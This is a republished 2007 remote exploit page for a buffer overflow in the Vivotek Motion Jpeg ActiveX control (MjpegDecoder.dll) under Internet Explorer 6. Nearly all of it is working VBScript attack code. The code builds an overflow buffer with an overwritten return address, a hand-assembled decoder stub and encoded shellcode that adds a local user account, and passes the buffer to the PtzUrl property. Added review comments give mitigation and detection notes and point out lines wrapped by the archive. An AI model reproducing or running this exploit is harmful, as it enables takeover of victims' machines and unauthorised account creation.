




2007-06-03 Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13) Remote Exploit
Rated as : High Risk

<!-- IE 6 / Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13)
remote buffer overflow exploit / win 2k sp4 en version
by rgod
site: retrogod.altervista.org

software site: http://www.vivotek.com/
"VIVOTEK INC. is a leading IP surveillance camera and Network
camera firm specialized in IP camera, Wireless network camera,
IP surveillance camera"

some notes:
the PtzUrl property is vulnerable to a stack-based buffer overflow;
we are in control of EIP, ESI, EDI and EBP, *all* in UNICODE-
expanded strings.
I used the "venetian method" to fully patch the shellcode.
This works remotely (2 out of 3) or by dragging the HTML file
into the browser window, not by clicking it.

Object safety report:

RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
-->
<HTML>
<!-- Review note: the page instantiates the control by its CLSID so that the
     VBScript below can reach the PtzUrl property. The object safety report
     in the header says the control is registered safe-for-scripting and
     safe-for-init and does not implement IObjectSafety, which is what lets
     IE hand it to script in the first place. Client-side mitigation: set the
     ActiveX kill bit for this CLSID, or remove/update the control; for
     detection, this CLSID string appearing in fetched HTML is a usable
     indicator. -->
<OBJECT classid='clsid:EAA105FE-7BBD-4196-8B96-D46743894195'
id='MjpegControl' ></OBJECT>
<script language='vbscript'>

' metasploit one, alpha2... add a user 'sun' with pass 'tzu'
' Review note: FRAGMENT is the author's encoded payload, kept exactly as
' printed. The local account it creates (per the comment above) is the
' post-exploitation artefact a responder would look for on an affected host.
' NOTE(review): the assignment appears to have been wrapped by the archive;
' as printed, "FRAGMENT =" and the unescape(...) line are separate lines
' rather than one VBScript statement.
FRAGMENT =
unescape("%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%71%40%71%40%71%40%71%40%71%40%72%40%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%eb%59%05%f8%ff%49%49%49%49%49%49%49%49%49%51%6a%58%30%31%42%42%78%42%42%41%30%41%50%42%75%39%6c%48%44%70%70%50%4b%35%6c%4b%6c%65%58%31%6f%4b%6f%38%4b%4f%70%61%6b%69%6b%34%6b%51%6e%31%70%79%6c%64%30%64%37%31%7a%4d%51%72%6b%54%4b%34%44%64%65%45%6b%4f%44%31%6b%66%4b%6c%6b%4b%6f%4c%71%4b%4b%4c%6b%51%4b%79%6c%54%74%73%61%50%64%4b%70%50%75%70%58%6c%4b%50%6c%6b%50%6c%4d%6b%38%48%4b%79%6b%30%50%70%30%70%4b%78%4c%6f%41%46%50%46%69%58%53%70%6b%50%48%6e%38%72%53%38%78%4e%6a%4e%37%6f%47%73%6d%44%4e%35%38%45%50%6f%43%30%4e%45%34%30%55%33%75%42%70%43%65%4e%50%54%58%35%70%4f%61%44%34%50%56%56%50%4e%55%64%50%6c%6f%63%51%4c%47%72%6f%75%70%30%71%44%6d%49%6e%79%73%74%62%41%64%6f%62%63%50%33%65%4e%50%6f%71%34%74%50%c3")

' Hand-assembled stub; each REM is the author's note of the instruction the
' bytes are meant to encode. Bytes are kept exactly as printed.
' (c1 is referenced as C1 further down; VBScript identifiers are
' case-insensitive, so that is not a defect.)
' NOTE(review): the REMs on C5 and C6 are wrapped onto a following line by
' the archive ("inc eax twice", "byte ptr esi works as nop"); as printed
' those continuation lines are not valid VBScript.
c1 = unescape("%95")                : REM xchg eax, ebp
C2 = unescape("%6e%05%ff%02")       : REM add eax 0200ff00h
C3 = unescape("%6e%2d%12%02")       : REM sub eax 02001200h
C4 = unescape("%6e%40%6e")          : REM inc eax
C5 = unescape("%80%90%6e%40%6e%40") : REM add byte ptr eax 90 ,
inc eax twice
C6 = unescape("%6e%80%90%6e%40%6e%40") : REM and again ... add
byte ptr esi works as nop

' CODE: the stub above followed by a long run of further patch pairs of the
' same shape as C5/C6 (see their REM notes), joined with VBScript line
' continuations. Left byte-identical on purpose: these are hand-laid bytes
' whose exact values and order matter, so a restyle is not safe.
CODE = C1 & C2 & C3 & C4 & C5 & C6 & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%03%6e%40%6e%40") & _
unescape("%6e%80%eb%6e%40%6e%40%6e%80%e8%6e%40%6e%40") & _
unescape("%6e%80%ff%6e%40%6e%40%6e%80%ff%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%37%6e%40%6e%40%6e%80%5a%6e%40%6e%40") & _
unescape("%6e%80%68%6e%40%6e%40%6e%80%50%6e%40%6e%40") & _
unescape("%6e%80%41%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%41%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%38%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%6d%6e%40%6e%40%6e%80%69%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%35%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%55%6e%40%6e%40") & _
unescape("%6e%80%4c%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%46%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%33%6e%40%6e%40%6e%80%48%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%75%6e%40%6e%40") & _
unescape("%6e%80%76%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%52%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%6b%6e%40%6e%40") & _
unescape("%6e%80%4e%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%6f%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%6f%6e%40%6e%40%6e%80%4b%6e%40%6e%40") & _
unescape("%6e%80%44%6e%40%6e%40%6e%80%65%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%38%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%76%6e%40%6e%40") & _
unescape("%6e%80%56%6e%40%6e%40%6e%80%51%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%66%6e%40%6e%40") & _
unescape("%6e%80%43%6e%40%6e%40%6e%80%48%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%62%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%7a%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%4a%6e%40%6e%40") & _
unescape("%6e%80%4f%6e%40%6e%40%6e%80%43%6e%40%6e%40") & _
unescape("%6e%80%77%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%55%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%43%6e%40%6e%40") & _
unescape("%6e%80%66%6e%40%6e%40%6e%80%6f%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%66%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%46%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%45%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%7a%6e%40%6e%40") & _
unescape("%6e%80%37%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%53%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%47%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%73%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%6a%6e%40%6e%40%6e%80%4d%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%30%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%64%6e%40%6e%40%6e%80%46%6e%40%6e%40") & _
unescape("%6e%80%59%6e%40%6e%40%6e%80%7a%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%66%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%64%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%72%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%74%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%74%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%35%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%72%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%65%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%37%6e%40%6e%40") & _
unescape("%6e%80%77%6e%40%6e%40%6e%80%37%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%31%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%73%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%30%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%42%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%50%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%74%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%64%6e%40%6e%40%6e%80%53%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%63%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%90%6e%40%6e%40%6e%40%6e")

' Buffer layout as the author assembled it: 262 bytes of 0x12 filler, the
' value written over EIP ("eip", see its REM), 4 bytes the author marks as
' untouched, 32 more filler bytes, then CODE, FRAGMENT and 16 trailing 0x90
' bytes. The 262+ offset is the only length hint on the page; the header
' says it overflows a stack buffer behind the PtzUrl property.
' NOTE(review): the "eip" REM and the "suntzu" assignment are each wrapped
' onto a second line by the archive; as printed they are not single
' VBScript statements.
bof         = string(262,unescape("%12"))
useful_junk = unescape("%12%12%12%12") 'not touch
junk        = string(32,unescape("%12"))
eip         = unescape("%23%7d") : REM 0x007d0023   call edi, 
module comctl32 found with msfpescan
suntzu      = bof + eip + useful_junk + junk + CODE + FRAGMENT +
string(16,unescape("%90"))

' The oversized string is handed to the property the header identifies as
' the overflow point. From the defender's side there is no length check
' reachable from script, so remediation is a vendor fix or disabling the
' control (kill bit); a page that sets this property to a string of this
' size is a reasonable signature for the issue.
MjpegControl.PtzUrl = suntzu

</script>
</HTML>


securitydot.net - 2007-06-03
